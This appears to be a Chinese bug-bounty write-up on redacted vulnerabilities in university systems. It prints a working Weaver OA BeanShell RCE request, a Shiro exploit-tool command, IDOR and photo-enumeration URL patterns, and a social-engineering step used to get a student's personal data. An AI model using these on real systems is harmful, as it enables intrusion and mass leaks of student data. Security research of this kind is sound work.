本文对edusrc挖掘的部分漏洞进行整理,将案例脱敏后输出成文章,不包含0DAY/BYPASS的案例过程,仅对挖掘思路和方法进行相关讲解。
命令执行类
在电量查询手机管理平台,观察到.do或.action后缀,
http://xxx:8080/mobile/mobile!login.action
通过工具检测存在struts2-046漏洞,
判断存在system系统权限,
直接getshell和执行任意命令。
泛微OA Bsh 远程代码执行漏洞为例:
通过个人经验或者cms识别工具判断目标的CMS类型,
http://xxx:8080/login/Login.jsp?logintype=1
先验证漏洞:
http://xxx/weaver/bsh.servlet.BshServlet
可以执行任意函数,
然后上burpsuite,发送以下数据包:
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: xxx:8080
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
bsh.script=eval%00("ex"%2b"ec("whoami")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
成功获取root权限,实现任意命令执行。
某大学宿舍管理系统存在apache shiro反序列化:在登录页面时,提交表单后发现set-cookie存在remeberMe=deleteMe字样。
exp:
https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip
如图:
java -jar shiro_tool.jar http://xxx.edu.cn/
Key已经爆破成功,使用xray的shrio插件或者shiro_attack_1.5使用构造链即可执行任意命令。
越权逻辑类
初次登陆需要更改密码,但未验证原始密码,
利用审查元素或抓包更改学号为其他人的,成功重置他人密码,
先获取高权限用户权限,然后将高权限用户接口放到低权限用户上访问对其没有限制,如:
对全校学生进行管理,泄露数万学生个人敏感信息,
http://xxx.edu.cn/xxx/student_new/query.jsp?cdbh=xxx
直接重置系统任意单位用户密码,
http://xxx/xxx/xxx/xxxPassword.jsp
直接查看照片链接,是否存在参数或文件名称可猜解(包含学号、工号、ID值等信息),遍历即可获取所有个人照片。如:
1、参数遍历:
http://xxx.edu.cn/Common/ResourceReq.ashx?t=stupic&i=学号 ......
2、文件名遍历:
http://xxx.edu.cn/attachments/ds_photo/工号.jpg http://xxx/xg/vfs/vfs.do?path=年份/STD_INFO/RXZP/学号.jpg ......
社工获取某学校学姐身份证号加学号等个人敏感信息,登录学工系统,在学工系统个人信息查看功能抓包,获取到以下接口,
通过修改学号获取个人相关敏感信息。
某大学体温上报系统,
抓包更改接口,泄露密码、学号、身份证号、手机号、学院专业等信息。
过往推文:
原文始发于微信公众号(Xiaoyu安全服务):eduSRC那些事儿-3(命令执行类+越权逻辑类)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论